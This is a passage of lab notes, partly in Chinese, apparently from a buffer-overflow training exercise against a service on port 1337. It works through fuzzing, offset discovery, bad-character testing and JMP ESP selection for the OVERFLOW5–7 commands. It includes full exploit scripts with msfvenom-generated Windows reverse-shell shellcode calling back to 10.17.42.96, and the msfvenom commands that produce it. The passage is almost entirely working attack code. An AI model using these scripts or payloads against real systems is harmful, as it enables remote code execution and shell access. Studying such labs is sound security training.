payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x16\x17\x2f\x30\xf4\xf5\xfd\xfe

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW5 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x15\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf3\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfc\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x16\x2f\xf4\xfd之后\x17\x30\xf5\xfe不受影响

BADCHAR: \x00\x16\x2f\xf4\xfd

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x16\x2f\xf4\xfd"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x16\x2f\xf4\xfd" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW5 "
offset = 314
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xfc\xbb\xc4\x7e\x93\x5d\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x38\x96\x11\x5d\xc0\x67\x76\xd7\x25\x56\xb6\x83\x2e\xc9\x06\xc7\x62\xe6\xed\x85\x96\x7d\x83\x01\x99\x36\x2e\x74\x94\xc7\x03\x44\xb7\x4b\x5e\x99\x17\x75\x91\xec\x56\xb2\xcc\x1d\x0a\x6b\x9a\xb0\xba\x18\xd6\x08\x31\x52\xf6\x08\xa6\x23\xf9\x39\x79\x3f\xa0\x99\x78\xec\xd8\x93\x62\xf1\xe5\x6a\x19\xc1\x92\x6c\xcb\x1b\x5a\xc2\x32\x94\xa9\x1a\x73\x13\x52\x69\x8d\x67\xef\x6a\x4a\x15\x2b\xfe\x48\xbd\xb8\x58\xb4\x3f\x6c\x3e\x3f\x33\xd9\x34\x67\x50\xdc\x99\x1c\x6c\x55\x1c\xf2\xe4\x2d\x3b\xd6\xad\xf6\x22\x4f\x08\x58\x5a\x8f\xf3\x05\xfe\xc4\x1e\x51\x73\x87\x76\x96\xbe\x37\x87\xb0\xc9\x44\xb5\x1f\x62\xc2\xf5\xe8\xac\x15\xf9\xc2\x09\x89\x04\xed\x69\x80\xc2\xb9\x39\xba\xe3\xc1\xd1\x3a\x0b\x14\x75\x6a\xa3\xc7\x36\xda\x03\xb8\xde\x30\x8c\xe7\xff\x3b\x46\x80\x6a\xc6\x01\xa5\x7b\xe2\xb1\xd1\x79\xf2\x34\x1b\xf7\x14\x5c\x4b\x51\x8f\xc9\xf2\xf8\x5b\x6b\xfa\xd6\x26\xab\x70\xd5\xd7\x62\x71\x90\xcb\x13\x71\xef\xb1\xb2\x8e\xc5\xdd\x59\x1c\x82\x1d\x17\x3d\x1d\x4a\x70\xf3\x54\x1e\x6c\xaa\xce\x3c\x6d\x2a\x28\x84\xaa\x8f\xb7\x05\x3e\xab\x93\x15\x86\x34\x98\x41\x56\x63\x76\x3f\x10\xdd\x38\xe9\xca\xb2\x92\x7d\x8a\xf8\x24\xfb\x93\xd4\xd2\xe3\x22\x81\xa2\x1c\x8a\x45\x23\x65\xf6\xf5\xcc\xbc\xb2\x06\x87\x9c\x93\x8e\x4e\x75\xa6\xd2\x70\xa0\xe5\xea\xf2\x40\x96\x08\xea\x21\x93\x55\xac\xda\xe9\xc6\x59\xdc\x5e\xe6\x4b\xdc\x60\x18\x74"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW6

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW6 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 1100 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW6 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 35694234 -> 5iB4 -> 4Bi5

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4Bi5 -l 1100

[*] Exact match at offset 1034

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW6 "
offset = 1034
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW6 "
offset = 1034
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x08\x09\x2c\x2d\xad\xae

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW6 "
offset = 1034
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x07\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x15\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2b\x2d\x2e\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xac\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf3\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfc\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x08\x2c\xad之后\x09\x2d\xae不受影响

BADCHAR: \x00\x08\x2c\xad

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x08\x2c\xad"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x08\x2c\xad" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW6 "
offset = 1034
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xbf\x69\x34\x2f\xb4\xdb\xdd\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\x31\x78\x12\x03\x78\x12\x83\xa9\x30\xcd\x41\xd5\xd1\x93\xaa\x25\x22\xf4\x23\xc0\x13\x34\x57\x81\x04\x84\x13\xc7\xa8\x6f\x71\xf3\x3b\x1d\x5e\xf4\x8c\xa8\xb8\x3b\x0c\x80\xf9\x5a\x8e\xdb\x2d\xbc\xaf\x13\x20\xbd\xe8\x4e\xc9\xef\xa1\x05\x7c\x1f\xc5\x50\xbd\x94\x95\x75\xc5\x49\x6d\x77\xe4\xdc\xe5\x2e\x26\xdf\x2a\x5b\x6f\xc7\x2f\x66\x39\x7c\x9b\x1c\xb8\x54\xd5\xdd\x17\x99\xd9\x2f\x69\xde\xde\xcf\x1c\x16\x1d\x6d\x27\xed\x5f\xa9\xa2\xf5\xf8\x3a\x14\xd1\xf9\xef\xc3\x92\xf6\x44\x87\xfc\x1a\x5a\x44\x77\x26\xd7\x6b\x57\xae\xa3\x4f\x73\xea\x70\xf1\x22\x56\xd6\x0e\x34\x39\x87\xaa\x3f\xd4\xdc\xc6\x62\xb1\x11\xeb\x9c\x41\x3e\x7c\xef\x73\xe1\xd6\x67\x38\x6a\xf1\x70\x3f\x41\x45\xee\xbe\x6a\xb6\x27\x05\x3e\xe6\x5f\xac\x3f\x6d\x9f\x51\xea\x22\xcf\xfd\x45\x83\xbf\xbd\x35\x6b\xd5\x31\x69\x8b\xd6\x9b\x02\x26\x2d\x4c\x27\xa6\x07\xec\x5f\xca\x57\xe9\xa6\x43\xb1\x9b\xc8\x05\x6a\x34\x70\x0c\xe0\xa5\x7d\x9a\x8d\xe6\xf6\x29\x72\xa8\xfe\x44\x60\x5d\x0f\x13\xda\xc8\x10\x89\x72\x96\x83\x56\x82\xd1\xbf\xc0\xd5\xb6\x0e\x19\xb3\x2a\x28\xb3\xa1\xb6\xac\xfc\x61\x6d\x0d\x02\x68\xe0\x29\x20\x7a\x3c\xb1\x6c\x2e\x90\xe4\x3a\x98\x56\x5f\x8d\x72\x01\x0c\x47\x12\xd4\x7e\x58\x64\xd9\xaa\x2e\x88\x68\x03\x77\xb7\x45\xc3\x7f\xc0\xbb\x73\x7f\x1b\x78\x83\xca\x01\x29\x0c\x93\xd0\x6b\x51\x24\x0f\xaf\x6c\xa7\xa5\x50\x8b\xb7\xcc\x55\xd7\x7f\x3d\x24\x48\xea\x41\x9b\x69\x3f"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW7

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW7 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 1400 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1400

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW7 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 72423572 -> rB5r -> r5Br

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q r5Br -l 1400

[*] Exact match at offset 1306

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW7 "
offset = 1306
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW7 "
offset = 1306
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x8c\x8d\xae\xaf\xbe\xbf\xfb\xfc

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW7 "
offset = 1306
overflow = "A" * offset
retn = "BBBB"
padding = ""
